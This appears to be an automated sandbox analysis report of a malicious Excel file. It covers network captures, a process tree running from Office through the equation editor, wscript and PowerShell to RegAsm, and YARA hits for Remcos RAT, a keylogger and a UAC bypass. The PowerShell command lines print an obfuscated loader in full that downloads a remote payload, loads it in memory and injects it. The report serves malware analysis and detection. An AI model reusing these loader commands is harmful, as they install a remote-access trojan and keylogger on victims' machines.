                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                                                                    Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    9192.168.2.224917514.194.50.211443
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:53:12 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 32 67 2e 6d 65 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: m2g.me
                                                                                                                                                                    2024-10-07 12:53:13 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:53:13 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    2024-10-07 12:53:13 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                    Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule
                                                                                                                                                                    2024-10-07 12:53:13 UTC6198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 74 69 74 6c 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 38 2c 38 32 33 20 20 20 20 3c 2f 73 70 61 6e 3e 2b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 68 6f 72 74 65 6e 65 64 20 6c 69 6e 6b 73 20 69 6e 20 74 6f 74 61 6c 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                    Data Ascii: <div class="counter-item"> <h2 class="counter-title"><span class="counter"> 38,823 </span>+</h2> <p>Shortened links in total</p>
                                                                                                                                                                    2024-10-07 12:53:13 UTC2INData Raw: 0d 0a
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    2024-10-07 12:53:13 UTC664INData Raw: 32 38 63 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6d 6f 64 65 72 6e 69 7a 72 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 70 6c 75 67 69 6e 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 77 6f 77 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                    Data Ascii: 28c<script src="assets/js/jquery-3.3.1.min.js"></script><script src="assets/js/modernizr-3.6.0.min.js"></script><script src="assets/js/plugins.js"></script><script src="assets/js/bootstrap.min.js"></script><script src="assets/js/wow.min.js"></script


                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:08:52:23
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                    Imagebase:0x13f790000
                                                                                                                                                                    File size:28'253'536 bytes
                                                                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:08:52:45
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                                                                                                                    Imagebase:0x13f570000
                                                                                                                                                                    File size:1'423'704 bytes
                                                                                                                                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:08:53:02
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:543'304 bytes
                                                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:08:53:05
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS"
                                                                                                                                                                    Imagebase:0xe30000
                                                                                                                                                                    File size:141'824 bytes
                                                                                                                                                                    MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:08:53:05
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                    Imagebase:0xaf0000
                                                                                                                                                                    File size:427'008 bytes
                                                                                                                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:16
                                                                                                                                                                    Start time:08:53:06
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')"
                                                                                                                                                                    Imagebase:0xaf0000
                                                                                                                                                                    File size:427'008 bytes
                                                                                                                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:18
                                                                                                                                                                    Start time:08:53:16
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                    Imagebase:0x960000
                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:08:53:16
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                    Imagebase:0x960000
                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.642861861.000000000241E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.642709056.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.642581330.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:20
                                                                                                                                                                    Start time:08:53:18
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\umamwkvoyd"
                                                                                                                                                                    Imagebase:0x960000
                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:21
                                                                                                                                                                    Start time:08:53:18
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wgfwwugimmoks"
                                                                                                                                                                    Imagebase:0x960000
                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:08:53:18
                                                                                                                                                                    Start date:07/10/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\hispxnqjaugxdnkyl"
                                                                                                                                                                    Imagebase:0x960000
                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Call Graph

                                                                                                                                                                    • Entrypoint
                                                                                                                                                                    • Decryption Function
                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    • Show Help
                                                                                                                                                                    callgraph 1 Error: Graph is empty

                                                                                                                                                                    Module: Sheet1

                                                                                                                                                                    Declaration
                                                                                                                                                                    LineContent
                                                                                                                                                                    1

                                                                                                                                                                    Attribute VB_Name = "Sheet1"

                                                                                                                                                                    2

                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                    3

                                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                                    4

                                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                                    5

                                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                                    6

                                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                                    7

                                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                                    8

                                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                                    Module: Sheet2

                                                                                                                                                                    Declaration
                                                                                                                                                                    LineContent
                                                                                                                                                                    1

                                                                                                                                                                    Attribute VB_Name = "Sheet2"

                                                                                                                                                                    2

                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                    3

                                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                                    4

                                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                                    5

                                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                                    6

                                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                                    7

                                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                                    8

                                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                                    Module: Sheet3

                                                                                                                                                                    Declaration
                                                                                                                                                                    LineContent
                                                                                                                                                                    1

                                                                                                                                                                    Attribute VB_Name = "Sheet3"

                                                                                                                                                                    2

                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                    3

                                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                                    4

                                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                                    5

                                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                                    6

                                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                                    7

                                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                                    8

                                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                                    Module: ThisWorkbook

                                                                                                                                                                    Declaration
                                                                                                                                                                    LineContent
                                                                                                                                                                    1

                                                                                                                                                                    Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                                    2

                                                                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                                    3

                                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                                    4

                                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                                    5

                                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                                    6

                                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                                    7

                                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                                    8

                                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                                    Reset < >
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.462980650.000000000057F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0057F000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_57f000_EQNEDT32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a1c773b7b55bbc128a4f6605cec1c0465bbb6883ab9795580730e10f0ded985a
                                                                                                                                                                      • Instruction ID: f86797de282d058f46b0833abf9f012a6e7b915501f18b406c93500e0d178579
                                                                                                                                                                      • Opcode Fuzzy Hash: a1c773b7b55bbc128a4f6605cec1c0465bbb6883ab9795580730e10f0ded985a
                                                                                                                                                                      • Instruction Fuzzy Hash: 18B1665208E7C65FD71387B428795A17FB09E23264B1E99CBC8C0CF1A3D14D599AD723
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.491285870.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_13_2_21d000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9de63be3af021ee6b7b328ba7d77fc58137f3b2f533022c2c9fe0c7cdd318650
                                                                                                                                                                      • Instruction ID: 3e6a81a3977f3e13eb7d0ec5e4ec264ac6f9078f4811fb8b92123ed9eac3da86
                                                                                                                                                                      • Opcode Fuzzy Hash: 9de63be3af021ee6b7b328ba7d77fc58137f3b2f533022c2c9fe0c7cdd318650
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F01F731524340EFE7104E25CCC47A7BBD8DF69764F18C559EC480F182C3799981CAB1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.491285870.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_13_2_21d000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
